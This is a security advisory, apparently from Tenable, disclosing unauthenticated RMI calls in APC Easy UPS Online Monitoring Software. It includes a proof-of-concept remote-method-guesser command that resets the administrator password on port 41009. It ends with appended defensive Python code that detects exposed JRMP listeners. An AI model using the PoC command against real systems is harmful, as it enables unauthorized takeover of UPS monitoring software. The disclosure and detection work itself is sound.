Schneider Electric APC Easy UPS Online Monitoring Software Unauthenticated RMI Calls
April 21, 2023, 5:42 p.m. | Nick Miles
Tenable Research Advisories www.tenable.com
A vulnerability in Schneider Electric APC Easy UPS Online Monitoring Software V2.5-GS-01-22320 allows an unauthenticated remote attacker to issue RMI calls to certain remote Java objects in the application.
For example, the attacker can invoke cn.com.voltronicpower.rmiclass.SystemService.updateManagerPassword() to change the administrator password for the monitoring software.
POC:
- Install remote-method-guesser (https://github.com/qtc-de/remote-method-guesser/)
- Run: java -jar rmg-4.3.1-jar-with-dependencies.jar call 41009 '"482c811da5d5b4bc6d497ffa98491e38"' --signature 'String updateManagerPassword(String managerPassword)' --bound-name system
- This command attempts to …
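For defenders auditing exposure, an added example (not from the Tenable advisory or the vendor): a Python check that reports whether a host you administer answers the Java RMI wire-protocol (JRMP) handshake on 41009, the port number that appears in the PoC command above. The function names and the sample reply bytes are constructed for illustration.

```python
import socket
import struct
import sys

JRMI_MAGIC = b"JRMI"      # JRMP stream magic sent by every RMI client
JRMI_VERSION = 2          # protocol version, 2-byte big-endian
STREAM_PROTOCOL = 0x4B    # client asks for StreamProtocol
PROTOCOL_ACK = 0x4E       # server accepts and echoes the client's endpoint


def build_handshake() -> bytes:
    """Client header: magic, 2-byte version, 1-byte protocol selector."""
    return JRMI_MAGIC + struct.pack(">HB", JRMI_VERSION, STREAM_PROTOCOL)


def parse_ack(data: bytes):
    """Return (host, port) from a ProtocolAck (0x4E, len, host, int port), else None."""
    if len(data) < 3 or data[0] != PROTOCOL_ACK:
        return None
    (host_len,) = struct.unpack(">H", data[1:3])
    end = 3 + host_len
    if len(data) < end + 4:
        return None  # truncated reply, do not treat as a positive
    host = data[3:end].decode("utf-8", errors="replace")
    (port,) = struct.unpack(">i", data[end:end + 4])
    return host, port


def speaks_jrmp(host: str, port: int = 41009, timeout: float = 3.0) -> bool:
    """True if host:port completes the JRMP handshake from this vantage point."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(build_handshake())
            reply = s.recv(512)
    except OSError:
        return False  # closed, filtered or unreachable
    return parse_ack(reply) is not None


if __name__ == "__main__":
    # Constructed sample reply: ack, then the endpoint "10.0.0.5":51234.
    sample = b"\x4e\x00\x08" + b"10.0.0.5" + struct.pack(">i", 51234)
    print(parse_ack(sample))
    # Hosts to audit are passed on the command line (your own inventory).
    for host in sys.argv[1:]:
        print(host, speaks_jrmp(host))
```

A `True` result from an untrusted network segment means the RMI listener, and with it the unauthenticated calls described above, is reachable from that segment.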